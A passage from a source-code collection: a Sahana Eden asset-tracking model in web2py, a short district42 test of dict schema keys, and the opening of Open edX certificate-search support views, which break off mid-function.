THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3AssetModel",
"asset_rheader",
"asset_types",
"asset_log_status",
]
from gluon import *
from gluon.sqlhtml import RadioWidget
from gluon.storage import Storage
from ..s3 import *
ASSET_TYPE_VEHICLE = 1 # => Extra Tab(s) for Registration Documents, Fuel Efficiency
ASSET_TYPE_RADIO = 2 # => Extra Tab(s) for Radio Channels/Frequencies
ASSET_TYPE_TELEPHONE = 3 # => Extra Tab(s) for Contact Details & Airtime Billing
ASSET_TYPE_OTHER = 4 # => No extra Tabs
# To pass to global scope
asset_types = {
"VEHICLE" : ASSET_TYPE_VEHICLE,
"RADIO" : ASSET_TYPE_RADIO,
"TELEPHONE" : ASSET_TYPE_TELEPHONE,
"OTHER" : ASSET_TYPE_OTHER,
}
ASSET_LOG_SET_BASE = 1
ASSET_LOG_ASSIGN = 2
ASSET_LOG_RETURN = 3
ASSET_LOG_CHECK = 4
ASSET_LOG_REPAIR = 5
ASSET_LOG_DONATED = 32
ASSET_LOG_LOST = 33
ASSET_LOG_STOLEN = 34
ASSET_LOG_DESTROY = 35
# To pass to global scope
asset_log_status = {
"SET_BASE" : ASSET_LOG_SET_BASE,
"ASSIGN" : ASSET_LOG_ASSIGN,
"RETURN" : ASSET_LOG_RETURN,
"CHECK" : ASSET_LOG_CHECK,
"REPAIR" : ASSET_LOG_REPAIR,
"DONATED" : ASSET_LOG_DONATED,
"LOST" : ASSET_LOG_LOST,
"STOLEN" : ASSET_LOG_STOLEN,
"DESTROY" : ASSET_LOG_DESTROY,
}
#SITE = 1
#LOCATION = 2
# =============================================================================
class S3AssetModel(S3Model):
    """
        Asset Management

        Defines the asset_asset and asset_log tables, their CRUD
        strings, search/report configuration and the reusable
        asset_id foreign-key field.
    """
    names = ["asset_asset",
             "asset_log",
             "asset_log_prep",
             "asset_asset_id",
            ]
    def model(self):
        """
            Define the asset tables and return the names to be exposed
            in global scope (via response.s3).
        """
        T = current.T
        db = current.db
        auth = current.auth
        request = current.request
        s3 = current.response.s3
        settings = current.deployment_settings
        currency_type = s3.currency_type
        person_id = self.pr_person_id
        location_id = self.gis_location_id
        organisation_id = self.org_organisation_id
        organisation_represent = self.org_organisation_represent
        site_id = self.org_site_id
        room_id = self.org_room_id
        item_id = self.supply_item_entity_id
        supply_item_id = self.supply_item_id
        supply_item_represent = self.supply_item_represent
        #supplier_id = self.proc_supplier_id
        UNKNOWN_OPT = current.messages.UNKNOWN_OPT
        # Vehicle tab(s) are only enabled when the vehicle module is active
        vehicle = settings.has_module("vehicle")
        s3_date_format = settings.get_L10n_date_format()
        s3_date_represent = lambda dt: S3DateTime.date_represent(dt, utc=True)
        # Shortcuts
        add_component = self.add_component
        comments = s3.comments
        configure = self.configure
        crud_strings = s3.crud_strings
        define_table = self.define_table
        meta_fields = s3.meta_fields
        super_link = self.super_link
        #--------------------------------------------------------------------------
        # Assets
        #
        asset_type_opts = { ASSET_TYPE_VEHICLE    : T("Vehicle"),
                            #ASSET_TYPE_RADIO    : T("Radio"),
                            #ASSET_TYPE_TELEPHONE : T("Telephone"),
                            ASSET_TYPE_OTHER     : T("Other")
                           }
        # Item representation without the unit-of-measure suffix
        asset_item_represent = lambda id: supply_item_represent(id,
                                                                show_um = False)
        ctable = self.supply_item_category
        itable = self.supply_item
        tablename = "asset_asset"
        table = define_table(tablename,
                             super_link("track_id", "sit_trackable"),
                             super_link("doc_id", "doc_entity"),
                             Field("number",
                                   label = T("Asset Number")),
                             item_id,
                             # Only items whose category allows assets
                             supply_item_id(represent = asset_item_represent,
                                            requires = IS_ONE_OF(db((ctable.can_be_asset == True) & \
                                                                    (itable.item_category_id == ctable.id)),
                                                                 "supply_item.id",
                                                                 asset_item_represent,
                                                                 sort=True,
                                                                 ),
                                            script = None, # No Item Pack Filter
                                            ),
                             # @ToDo: Can we set this automatically based on Item Category?
                             Field("type", "integer",
                                   readable = vehicle,
                                   writable = vehicle,
                                   requires = IS_IN_SET(asset_type_opts),
                                   default = ASSET_TYPE_OTHER,
                                   represent = lambda opt: \
                                       asset_type_opts.get(opt, UNKNOWN_OPT),
                                   label = T("Type")),
                             Field("sn",
                                   label = T("Serial Number")),
                             # @ToDo: Switch to using proc_supplier
                             #supplier_id(),
                             Field("supplier",
                                   label = T("Supplier")),
                             Field("purchase_date", "date",
                                   label = T("Purchase Date"),
                                   requires = IS_NULL_OR(IS_DATE(format = s3_date_format)),
                                   represent = s3_date_represent,
                                   widget = S3DateWidget()),
                             Field("purchase_price", "double",
                                   default=0.00,
                                   represent=lambda v, row=None: IS_FLOAT_AMOUNT.represent(v, precision=2)),
                             currency_type("purchase_currency"),
                             # Base Location, which should always be a Site & set via Log
                             location_id(readable=False,
                                         writable=False),
                             # Populated onaccept of the log to make a component tab
                             person_id("assigned_to_id",
                                       readable=False,
                                       writable=False,
                                       comment=self.pr_person_comment(child="assigned_to_id")),
                             comments(),
                             *(s3.address_fields() + meta_fields()))
        # CRUD strings
        ADD_ASSET = T("Add Asset")
        LIST_ASSET = T("List Assets")
        crud_strings[tablename] = Storage(
            title_create = ADD_ASSET,
            title_display = T("Asset Details"),
            title_list = LIST_ASSET,
            title_update = T("Edit Asset"),
            title_search = T("Search Assets"),
            title_upload = T("Import Assets"),
            subtitle_create = T("Add New Asset"),
            subtitle_list = T("Assets"),
            label_list_button = LIST_ASSET,
            label_create_button = ADD_ASSET,
            label_delete_button = T("Delete Asset"),
            msg_record_created = T("Asset added"),
            msg_record_modified = T("Asset updated"),
            msg_record_deleted = T("Asset deleted"),
            msg_list_empty = T("No Assets currently registered"))
        # Reusable Field (foreign key for other tables to reference assets)
        asset_id = S3ReusableField("asset_id", db.asset_asset,
                                   sortby="number",
                                   requires = IS_NULL_OR(IS_ONE_OF(db,
                                                                   "asset_asset.id",
                                                                   self.asset_represent,
                                                                   sort=True)),
                                   represent = self.asset_represent,
                                   label = T("Asset"),
                                   ondelete = "CASCADE")
        table.virtualfields.append(AssetVirtualFields())
        # Search Method
        asset_search = S3Search(
            # Advanced Search only
            advanced=(
                    S3SearchSimpleWidget(
                        name="asset_search_text",
                        label=T("Search"),
                        comment=T("You can search by asset number, item description or comments. You may use % as wildcard. Press 'Search' without input to list all assets."),
                        field=[
                                "number",
                                "item_id$name",
                                #"item_id$category_id$name",
                                "comments",
                            ]
                      ),
                    S3SearchLocationHierarchyWidget(
                        name="asset_search_L1",
                        field="L1",
                        cols = 3
                    ),
                    S3SearchLocationHierarchyWidget(
                        name="asset_search_L2",
                        field="L2",
                        cols = 3
                    ),
                    S3SearchLocationWidget(
                        name="asset_search_map",
                        label=T("Map"),
                    ),
                    S3SearchOptionsWidget(
                        name="asset_search_item_category",
                        field=["item_id$item_category_id"],
                        label=T("Category"),
                        cols = 3
                    ),
            ))
        hierarchy = current.gis.get_location_hierarchy()
        report_fields = [
                         "number",
                         (T("Category"), "item_id$item_category_id"),
                         (T("Item"), "item_id"),
                         (T("Facility/Site"), "site"),
                         (hierarchy["L1"], "L1"),
                         (hierarchy["L2"], "L2"),
                        ]
        # Resource Configuration
        configure(tablename,
                  super_entity=("supply_item_entity", "sit_trackable"),
                  search_method = asset_search,
                  report_filter=[
                            S3SearchLocationHierarchyWidget(
                                name="asset_search_L1",
                                field="L1",
                                cols = 3
                            ),
                            S3SearchLocationHierarchyWidget(
                                name="asset_search_L2",
                                field="L2",
                                cols = 3
                            ),
                            S3SearchOptionsWidget(
                                name="asset_search_item_category",
                                field=["item_id$item_category_id"],
                                label=T("Category"),
                                cols = 3
                            ),
                        ],
                  report_rows = report_fields,
                  report_cols = report_fields,
                  report_fact = report_fields,
                  report_method=["count", "list"],
                  list_fields=["id",
                               "number",
                               "item_id$item_category_id",
                               "item_id",
                               "type",
                               "purchase_date",
                               #"organisation_id",
                               "location_id",
                               "L0",
                               "L1",
                               #"L2",
                               #"L3",
                               "comments"
                            ])
        # Log as component of Assets
        add_component("asset_log", asset_asset="asset_id")
        # Vehicles as component of Assets
        add_component("vehicle_vehicle",
                      asset_asset=dict(joinby="asset_id",
                                       multiple=False))
        # GPS as a component of Assets
        add_component("vehicle_gps", asset_asset="asset_id")
        # =====================================================================
        # Asset Log
        #
        asset_log_status_opts = {ASSET_LOG_SET_BASE : T("Base Facility/Site Set"),
                                 ASSET_LOG_ASSIGN   : T("Assigned"),
                                 ASSET_LOG_RETURN   : T("Returned"),
                                 ASSET_LOG_CHECK    : T("Checked"),
                                 ASSET_LOG_REPAIR   : T("Repaired"),
                                 ASSET_LOG_DONATED  : T("Donated"),
                                 ASSET_LOG_LOST     : T("Lost"),
                                 ASSET_LOG_STOLEN   : T("Stolen"),
                                 ASSET_LOG_DESTROY  : T("Destroyed"),
                                 }
        #site_or_location_opts = {SITE    :T("Site"),
        #                         LOCATION:T("Location")}
        asset_condition_opts = {
                                1:T("Good Condition"),
                                2:T("Minor Damage"),
                                3:T("Major Damage"),
                                4:T("Un-Repairable"),
                                5:T("Needs Maintenance"),
                               }
        tablename = "asset_log"
        table = define_table(tablename,
                             asset_id(),
                             Field("status",
                                   "integer",
                                   label = T("Status"),
                                   requires = IS_IN_SET(asset_log_status_opts),
                                   represent = lambda opt: \
                                       asset_log_status_opts.get(opt, UNKNOWN_OPT)
                                   ),
                             Field("datetime",
                                   "datetime",
                                   label = T("Date"),
                                   default=request.utcnow,
                                   requires = IS_EMPTY_OR(IS_UTC_DATETIME()),
                                   widget = S3DateTimeWidget(),
                                   represent = s3_date_represent,
                                   ),
                             Field("datetime_until",
                                   "datetime",
                                   label = T("Date Until"),
                                   requires = IS_EMPTY_OR(IS_UTC_DATETIME()),
                                   widget = S3DateTimeWidget(),
                                   represent = s3_date_represent,
                                   ),
                             person_id(label = T("Assigned To")),
                             Field("check_in_to_person",
                                   "boolean",
                                   #label = T("Mobile"),      # Relabel?
                                   label = T("Track with this Person?"),
                                   comment = DIV(_class="tooltip",
                                                 #_title="%s|%s" % (T("Mobile"),
                                                 _title="%s|%s" % (T("Track with this Person?"),
                                                                   T("If selected, then this Asset's Location will be updated whenever the Person's Location is updated."))),
                                   readable = False,
                                   writable = False),
                             organisation_id(),  # This is the Organisation to whom the loan is made
                             #Field("site_or_location",
                             #      "integer",
                             #      requires = IS_NULL_OR(IS_IN_SET(site_or_location_opts)),
                             #      represent = lambda opt: \
                             #          site_or_location_opts.get(opt, UNKNOWN_OPT),
                             #      widget = RadioWidget.widget,
                             #      label = T("Facility or Location")),
                             site_id,
                             room_id(),
                             #location_id(),
                             Field("cancel", #
                                   "boolean",
                                   default = False,
                                   label = T("Cancel Log Entry"),
                                   comment = DIV(_class="tooltip",
                                                 _title="%s|%s" % (T("Cancel Log Entry"),
                                                                   T("'Cancel' will indicate an asset log entry did not occur")))
                                   ),
                             Field("cond", "integer",  # condition is a MySQL reserved word
                                   requires = IS_IN_SET(asset_condition_opts,
                                                        zero = "%s..." % T("Please select")),
                                   represent = lambda opt: \
                                       asset_condition_opts.get(opt, UNKNOWN_OPT),
                                   label = T("Condition")),
                             person_id("by_person_id",
                                       label = T("Assigned By"),               # This can either be the Asset controller if signed-out from the store
                                       default = auth.s3_logged_in_person(),   # or the previous owner if passed on directly (e.g. to successor in their post)
                                       comment = self.pr_person_comment(child="by_person_id"),
                                       ),
                             comments(),
                             *meta_fields())
        # NOTE(review): site_id.label is assigned twice (here and four
        # lines below) -- presumably a harmless copy/paste remnant.
        table.site_id.label = T("Facility/Site")
        table.site_id.readable = True
        table.site_id.writable = True
        table.site_id.widget = None
        table.site_id.label = T("Facility/Site")
        table.site_id.comment = (DIV(_class="tooltip",
                                     _title="%s|%s" % (T("Facility/Site"),
                                                       T("Enter some characters to bring up a list of possible matches")),
                                     ),
                                 SCRIPT("""
$(document).ready(function() {
S3FilterFieldChange({
    'FilterField':  'organisation_id',
    'Field':        'site_id',
    'FieldPrefix':  'org',
    'FieldResource':'site',
    'FieldID'  :    'site_id',
});
});""")
                                )
        # CRUD strings
        ADD_ASSIGN = T("New Asset Log Entry") # Change Label?
        LIST_ASSIGN = T("Asset Log")
        crud_strings[tablename] = Storage(
            title_create = ADD_ASSIGN,
            title_display = T("Asset Log Details"),
            title_list = LIST_ASSIGN,
            title_update = T("Edit Asset Log Entry"),
            title_search = T("Search Asset Log"),
            subtitle_create = ADD_ASSIGN,
            subtitle_list = T("Asset Log"),
            label_list_button = LIST_ASSIGN,
            label_create_button = ADD_ASSIGN,
            label_delete_button = T("Delete Asset Log Entry"),
            msg_record_created = T("Asset Log Entry created"), # Change Label?
            msg_record_modified = T("Asset Log Entry updated"),
            msg_record_deleted = T("Asset Log Entry deleted"),
            msg_list_empty = T("Asset Log Empty"))
        # Resource configuration
        configure(tablename,
                  onvalidation = self.asset_log_onvalidation,
                  onaccept = self.asset_log_onaccept,
                  listadd = False,
                  list_fields = ["id",
                                 "status",
                                 "datetime",
                                 "datetime_until",
                                 "organisation_id",
                                 #"site_or_location",
                                 "site_id",
                                 "room_id",
                                 #"location_id",
                                 "cancel",
                                 "cond",
                                 "comments"]
                  )
        # ---------------------------------------------------------------------
        # Pass variables back to global scope (response.s3.*)
        #
        return Storage(
                    asset_asset_id = asset_id,
                    asset_rheader = asset_rheader,
                    asset_represent = self.asset_represent,
                    asset_log_prep = self.asset_log_prep,
                )
    # -------------------------------------------------------------------------
    @staticmethod
    def defaults():
        """ Return safe defaults for names in case the model is disabled """
        asset_id = S3ReusableField("asset_id", "integer",
                                   writable=False,
                                   readable=False)
        return Storage(asset_asset_id=asset_id)
    # -------------------------------------------------------------------------
    @staticmethod
    def asset_represent(id):
        """
            String representation of an asset record:
            "<number> (<item name>[, <brand name>])",
            or the standard NONE message if no record matches.
        """
        db = current.db
        s3db = current.s3db
        messages = current.messages
        NONE = messages.NONE
        table = s3db.asset_asset
        itable = s3db.supply_item
        btable = s3db.supply_brand
        query = (table.id == id) & \
                (itable.id == table.item_id)
        r = db(query).select(table.number,
                             itable.name,
                             btable.name,
                             left = btable.on(itable.brand_id == btable.id),
                             limitby=(0, 1)).first()
        if r:
            represent = "%s (%s" % (r.asset_asset.number,
                                    r.supply_item.name)
            if r.supply_brand.name:
                represent = "%s, %s)" % (represent,
                                         r.supply_brand.name)
            else:
                represent = "%s)" % represent
        else:
            represent = NONE
        return represent
    # -------------------------------------------------------------------------
    @staticmethod
    def asset_log_onvalidation(form):
        """
            Form validation hook for asset_log.
            Currently a no-op: the site-or-location requirement below is
            commented out, so status/type are read but not acted upon.
        """
        request = current.request
        s3 = current.response.s3
        status = int(request.post_vars.get("status", 0))
        type = request.get_vars.get("type", None)
        #if status == asset_log_status["ASSIGN"] and type == "organisation":
            # Site or Location is required
        #    if not form.vars.site_id and not form.vars.location_id:
        #        response.error = T("The asset must be assigned to a site OR location.")
        #        form.errors.site_or_location = T("Please enter a site OR a location")
    # -------------------------------------------------------------------------
    @staticmethod
    def asset_log_onaccept(form):
        """
            onaccept hook for asset_log: if the accepted entry is the
            asset's newest log entry, update the asset's tracking state
            (base location, check-in to person/site/org, or return to
            base) according to the entry's status.
        """
        db = current.db
        s3db = current.s3db
        request = current.request
        s3 = current.response.s3
        tracker = S3Tracker()
        ltable = s3db.asset_log
        vars = form.vars
        query = (ltable.id == vars.id)
        asset_id = db(query).select(ltable.asset_id,
                                    limitby=(0, 1)).first().asset_id
        current_log = asset_get_current_log(asset_id)
        status = int(vars.status or request.vars.status)
        request.get_vars.pop("status", None)
        type = request.get_vars.pop("type", None)
        # NOTE(review): .replace is applied before the None-guard below;
        # if vars.datetime can ever be None this raises AttributeError --
        # confirm the form always supplies a datetime.
        vars.datetime = vars.datetime.replace(tzinfo=None)
        if vars.datetime and \
            (not current_log.datetime or \
             current_log.datetime <= vars.datetime):
            # This is a current assignment
            atable = s3db.asset_asset
            asset_tracker = tracker(atable, asset_id)
            if status == ASSET_LOG_SET_BASE:
                # Set Base Location
                asset_tracker.set_base_location(tracker(s3db.org_site,
                                                        vars.site_id))
                # Populate the address fields
                s3.address_update(atable, asset_id)
            if status == ASSET_LOG_ASSIGN:
                if type == "person":#
                    if vars.check_in_to_person:
                        asset_tracker.check_in(s3db.pr_person, vars.person_id,
                                               timestmp = vars.datetime)
                    else:
                        asset_tracker.set_location(vars.person_id,
                                                   timestmp = vars.datetime)
                    # Update main record for component
                    query = (atable.id == asset_id)
                    db(query).update(assigned_to_id=vars.person_id)
                elif type == "site":
                    asset_tracker.check_in(s3db.org_site, vars.site_id,
                                           timestmp = vars.datetime)
                elif type == "organisation":
                    #if vars.site_or_location == SITE:
                    asset_tracker.check_in(s3db.org_site, vars.site_id,
                                           timestmp = vars.datetime)
                    #if vars.site_or_location == LOCATION:
                    #    asset_tracker.set_location(vars.location_id,
                    #                               timestmp = vars.datetime)
            if status == ASSET_LOG_RETURN:
                # Set location to base location
                asset_tracker.set_location(asset_tracker,
                                           timestmp = vars.datetime)
        return
    # -------------------------------------------------------------------------
    @staticmethod
    def asset_log_prep(r):
        """
            Called by Controller

            Customise the asset_log form for the requested operation:
            depending on ?status= / ?type= in the URL, pre-set and hide
            the status field and relabel/restrict the person, site and
            organisation fields (set base, return, assign, or a plain
            status update).
        """
        T = current.T
        db = current.db
        s3db = current.s3db
        request = current.request
        s3 = current.response.s3
        table = s3db.asset_log
        if r.record:
            asset = Storage(r.record)
        else:
            # This is a new record
            asset = Storage()
            table.cancel.readable = False
            table.cancel.writable = False
        # This causes an error with the dataTables paginate
        # if used only in r.interactive & not also r.representation=="aadata"
        if r.method != "read" and r.method != "update":
            table.cancel.readable = False
            table.cancel.writable = False
        current_log = asset_get_current_log(asset.id)
        if request.vars.status:
            status = int(request.vars.status)
        else:
            status = 0
        if status and status != "None":
            field = table.status
            field.default = status
            field.readable = False
            field.writable = False
        elif current_log:
            table.status.default = current_log.status
        crud_strings = s3.crud_strings.asset_log
        if status == ASSET_LOG_SET_BASE:
            crud_strings.subtitle_create = T("Set Base Facility/Site")
            crud_strings.msg_record_created = T("Base Facility/Site Set")
            table.by_person_id.label = T("Set By")
            table.site_id.writable = True
            table.site_id.requires = IS_ONE_OF(db, "org_site.id",
                                               table.site_id.represent)
            table.datetime_until.readable = False
            table.datetime_until.writable = False
            table.person_id.readable = False
            table.person_id.writable = False
            #table.site_or_location.readable = False
            #table.site_or_location.writable = False
            #table.location_id.readable = False
            #table.location_id.writable = False
        elif status == ASSET_LOG_RETURN:
            crud_strings.subtitle_create = T("Return")
            crud_strings.msg_record_created = T("Returned")
            table.person_id.label = T("Returned From")
            table.person_id.default = current_log.person_id
            #table.site_or_location.readable = False
            #table.site_or_location.writable = False
            table.site_id.readable = False
            table.site_id.writable = False
            #table.location_id.readable = False
            #table.location_id.writable = False
        elif status == ASSET_LOG_ASSIGN:
            type = request.vars.type
            # table["%s_id" % type].required = True
            if type == "person":#
                crud_strings.subtitle_create = T("Assign to Person")
                crud_strings.msg_record_created = T("Assigned to Person")
                table["person_id"].requires = IS_ONE_OF(db, "pr_person.id",
                                                        table.person_id.represent,
                                                        orderby="pr_person.first_name",
                                                        sort=True,
                                                        error_message="Person must be specified!")
                table.check_in_to_person.readable = True
                table.check_in_to_person.writable = True
            elif type == "site":
                crud_strings.subtitle_create = T("Assign to Facility/Site")
                crud_strings.msg_record_created = T("Assigned to Facility/Site")
                table["site_id"].requires = IS_ONE_OF(db, "org_site.site_id",
                                                      table.site_id.represent)
                #field = table.site_or_location
                #field.readable = False
                #field.writable = False
                #field.default = SITE
                #table.location_id.readable = False
                #table.location_id.writable = False
            elif type == "organisation":
                crud_strings.subtitle_create = T("Assign to Organization")
                crud_strings.msg_record_created = T("Assigned to Organization")
                table["organisation_id"].requires = IS_ONE_OF(db, "org_organisation.id",
                                                              table.organisation_id.represent,
                                                              orderby="org_organisation.name",
                                                              sort=True)
                #table.site_or_location.required = True
        elif "status" in request.get_vars:
            crud_strings.subtitle_create = T("Update Status")
            crud_strings.msg_record_created = T("Status Updated")
            table.person_id.label = T("Updated By")
            field = table.status
            field.readable = True
            field.writable = True
            field.requires = IS_IN_SET({ASSET_LOG_CHECK    : T("Check"),
                                        ASSET_LOG_REPAIR   : T("Repair"),
                                        ASSET_LOG_DONATED  : T("Donated"),
                                        ASSET_LOG_LOST     : T("Lost"),
                                        ASSET_LOG_STOLEN   : T("Stolen"),
                                        ASSET_LOG_DESTROY  : T("Destroyed"),
                                       })
# =============================================================================
def asset_get_current_log(asset_id):
    """Return the most recent non-cancelled log entry for an asset.

    Looks up asset_log rows for the given asset, ignoring cancelled and
    deleted entries, and returns the newest one as a Storage with the
    fields datetime, person_id, cond, status and site_id (cond/status
    normalised to int).  Returns an empty Storage when no entry exists.
    """
    ltable = current.s3db.asset_log
    query = (ltable.asset_id == asset_id) & \
            (ltable.cancel == False) & \
            (ltable.deleted == False)
    # Newest entry first, fetch just the one row
    entry = current.db(query).select(ltable.id,
                                     ltable.status,
                                     ltable.datetime,
                                     ltable.cond,
                                     ltable.person_id,
                                     ltable.site_id,
                                     #ltable.location_id,
                                     orderby = ~ltable.datetime,
                                     limitby=(0, 1)).first()
    if not entry:
        return Storage()
    return Storage(datetime = entry.datetime,
                   person_id = entry.person_id,
                   cond = int(entry.cond or 0),
                   status = int(entry.status or 0),
                   site_id = entry.site_id,
                   #location_id = entry.location_id
                   )
# =============================================================================
def asset_rheader(r):
    """ Resource Header for Assets

        Builds the tabbed header shown above asset views: detail tabs
        (plus vehicle tabs for vehicle-type assets), action buttons for
        the log workflow (set base / assign / return / update status)
        and a summary table of the asset's current log state.
        Returns None for non-HTML representations or when no record.
    """
    if r.representation == "html":
        record = r.record
        if record:
            T = current.T
            s3db = current.s3db
            s3 = current.response.s3
            NONE = current.messages.NONE
            if record.type == ASSET_TYPE_VEHICLE:
                tabs = [(T("Asset Details"), None),
                        (T("Vehicle Details"), "vehicle"),
                        (T("GPS Data"), "gps")]
            else:
                tabs = [(T("Edit Details"), None)]
            #elif record.type == s3.asset.ASSET_TYPE_RADIO:
            #    tabs.append((T("Radio Details"), "radio"))
            #elif record.type == s3.asset.ASSET_TYPE_TELEPHONE:
            #    tabs.append((T("Telephone Details"), "phone"))
            tabs.append((T("Log"), "log"))
            tabs.append((T("Documents"), "document"))
            rheader_tabs = s3_rheader_tabs(r, tabs)
            # URLs point back at whichever controller is serving the page
            if current.request.controller == "vehicle":
                func = "vehicle"
            else:
                func = "asset"
            # @ToDo: Check permissions before displaying buttons
            asset_action_btns = [ A( T("Set Base Facility/Site"),
                                     _href = URL(f=func,
                                                 args = [record.id, "log", "create"],
                                                 vars = dict(status = ASSET_LOG_SET_BASE)
                                                 ),
                                     _class = "action-btn"
                                     )
                                ]
            current_log = asset_get_current_log(record.id)
            status = current_log.status
            if record.location_id:
                # A Base Site has been set
                if status == ASSET_LOG_ASSIGN:
                    asset_action_btns += [ A( T("Return"),
                                              _href = URL(f=func,
                                                          args = [record.id, "log", "create"],
                                                          vars = dict(status = ASSET_LOG_RETURN)
                                                          ),
                                              _class = "action-btn"
                                              )
                                        ]
                # Disposal statuses (DONATED and above) make the asset
                # unavailable for further assignment
                if status < ASSET_LOG_DONATED:
                    # @ToDo: deployment setting to prevent assigning assets before returning them
                    # The Asset is available for assignment (not disposed)
                    asset_action_btns += [ A( T("Assign to Person"),
                                              _href = URL(f=func,
                                                          args = [record.id, "log", "create"],
                                                          vars = dict(status = ASSET_LOG_ASSIGN,
                                                                      type = "person")
                                                          ),
                                              _class = "action-btn"
                                              ),
                                           A( T("Assign to Facility/Site"),
                                              _href = URL(f=func,
                                                          args = [record.id, "log", "create"],
                                                          vars = dict(status = ASSET_LOG_ASSIGN,
                                                                      type = "site")
                                                          ),
                                              _class = "action-btn"
                                              ),
                                           A( T("Assign to Organization"),
                                              _href = URL(f=func,
                                                          args = [record.id, "log", "create"],
                                                          vars = dict(status = ASSET_LOG_ASSIGN,
                                                                      type = "organisation")
                                                          ),
                                              _class = "action-btn"
                                              ),
                                        ]
                asset_action_btns += [ A( T("Update Status"),
                                          _href = URL(f=func,
                                                      args = [record.id, "log", "create"],
                                                      vars = None
                                                      ),
                                          _class = "action-btn"
                                          ),
                                    ]
            table = r.table
            ltable = s3db.asset_log
            rheader = DIV(TABLE(TR( TH("%s: " % table.number.label),
                                    record.number,
                                    TH("%s: " % table.item_id.label),
                                    table.item_id.represent(record.item_id)
                                  ),
                                TR( TH("%s: " % ltable.cond.label),
                                    ltable.cond.represent(current_log.cond),
                                    TH("%s: " % ltable.status.label),
                                    ltable.status.represent(status),
                                  ),
                                TR( TH("%s: " % ltable.person_id.label),
                                    ltable.person_id.represent(current_log.person_id),
                                    TH("%s: " % ltable.site_id.label),
                                    ltable.site_id.represent(current_log.site_id),
                                    #TH("%s: " % ltable.location_id.label),
                                    # ltable.location_id.represent(current_log.location_id),
                                  ),
                               ),
                          DIV(_style = "margin-top:5px;",
                              *asset_action_btns
                              ),
                          rheader_tabs
                         )
            return rheader
    return None
# =============================================================================
class AssetVirtualFields:
    """ Virtual fields as dimension classes for reports """

    def site(self):
        # Name of the site at the asset's base location (report dimension)
        try:
            location_id = self.asset_asset.location_id
        except AttributeError:
            # Row does not carry the asset table
            location_id = None
        if not location_id:
            return current.messages.NONE
        s3db = current.s3db
        stable = s3db.org_site
        row = current.db(stable.location_id == location_id).select(
                                            stable.name,
                                            stable.site_id,
                                            stable.instance_type,
                                            limitby=(0, 1)).first()
        if row:
            return s3db.org_site_represent(row, link=False)
        return current.messages.NONE
# END =========================================================================
|
flavour/iscram
|
modules/eden/asset.py
|
Python
|
mit
| 41,981
|
from typing import KeysView
from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_empty_keys():
    with given:
        empty_dict_schema = schema.dict
    with when:
        keys = empty_dict_schema.keys()
    with then:
        # a bare dict schema declares no keys
        assert keys == KeysView([])
def test_dict_keys():
    with given:
        user_schema = schema.dict({
            "id": schema.int,
            "name": schema.str,
            optional("email"): schema.str,
        })
    with when:
        keys = user_schema.keys()
    with then:
        # optional keys are reported alongside required ones
        assert keys == KeysView(["id", "name", "email"])
|
nikitanovosibirsk/district42
|
tests/dict/test_dict_keys.py
|
Python
|
mit
| 572
|
"""
Certificate end-points used by the student support UI.
See lms/djangoapps/support for more details.
"""
import logging
import urllib
from functools import wraps
import bleach
from django.db import transaction
from django.db.models import Q
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError
from django.utils.translation import gettext as _
from django.views.decorators.http import require_GET, require_POST
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.student.models import CourseEnrollment, User
from common.djangoapps.util.json_request import JsonResponse
from lms.djangoapps.certificates.api import generate_certificate_task, get_certificates_for_user
from lms.djangoapps.certificates.permissions import GENERATE_ALL_CERTIFICATES, VIEW_ALL_CERTIFICATES
from lms.djangoapps.instructor_task.api import generate_certificates_for_students
from openedx.core.djangoapps.content.course_overviews.api import get_course_overview_or_none
log = logging.getLogger(__name__)
def require_certificate_permission(permission):
    """
    View decorator that requires permission to view and regenerate certificates.
    """
    def inner(func):
        """Decorate ``func`` so it is only reachable with ``permission``."""
        @wraps(func)
        def wrapper(request, *args, **kwargs):
            """Forbid the request unless the user holds the global permission."""
            if not request.user.has_perm(permission, 'global'):
                return HttpResponseForbidden()
            return func(request, *args, **kwargs)
        return wrapper
    return inner
@require_GET
@require_certificate_permission(VIEW_ALL_CERTIFICATES)
def search_certificates(request):
    """
    Search for certificates for a particular user OR along with the given course.
    Supports search by either username or email address along with course id.
    First filter the records for the given username/email and then filter against the given course id (if given).
    Show the 'Regenerate' button if a record found in 'generatedcertificate' model otherwise it will show the Generate
    button.
    Arguments:
        request (HttpRequest): The request object.
    Returns:
        JsonResponse
    Example Usage:
        GET /certificates/search?user=bob@example.com
        GET /certificates/search?user=bob@example.com&course_id=xyz
        Response: 200 OK
        Content-Type: application/json
        [
            {
                "username": "bob",
                "course_key": "edX/DemoX/Demo_Course",
                "type": "verified",
                "status": "downloadable",
                "download_url": "http://www.example.com/cert.pdf",
                "grade": "0.98",
                "created": 2015-07-31T00:00:00Z,
                "modified": 2015-07-31T00:00:00Z
            }
        ]
    """
    # Round-trip the value through quote_plus/unquote, then bleach-clean
    # it before using it in a query.  NOTE(review): unquote does not
    # decode '+', so a space in the input survives as '+' here --
    # presumably acceptable for usernames/emails; confirm.
    unbleached_filter = urllib.parse.unquote(urllib.parse.quote_plus(request.GET.get("user", "")))
    user_filter = bleach.clean(unbleached_filter)
    if not user_filter:
        msg = _("user is not given.")
        return HttpResponseBadRequest(msg)
    # The filter may be either a username or an email address
    try:
        user = User.objects.get(Q(email=user_filter) | Q(username=user_filter))
    except User.DoesNotExist:
        return HttpResponseBadRequest(_("user '{user}' does not exist").format(user=user_filter))
    certificates = get_certificates_for_user(user.username)
    # Normalise each record for JSON serialisation and add the
    # regenerate flag (PDF certificates cannot be regenerated)
    for cert in certificates:
        cert["course_key"] = str(cert["course_key"])
        cert["created"] = cert["created"].isoformat()
        cert["modified"] = cert["modified"].isoformat()
        cert["regenerate"] = not cert['is_pdf_certificate']
    # ':' and '/' are legal in course ids, so keep them unescaped
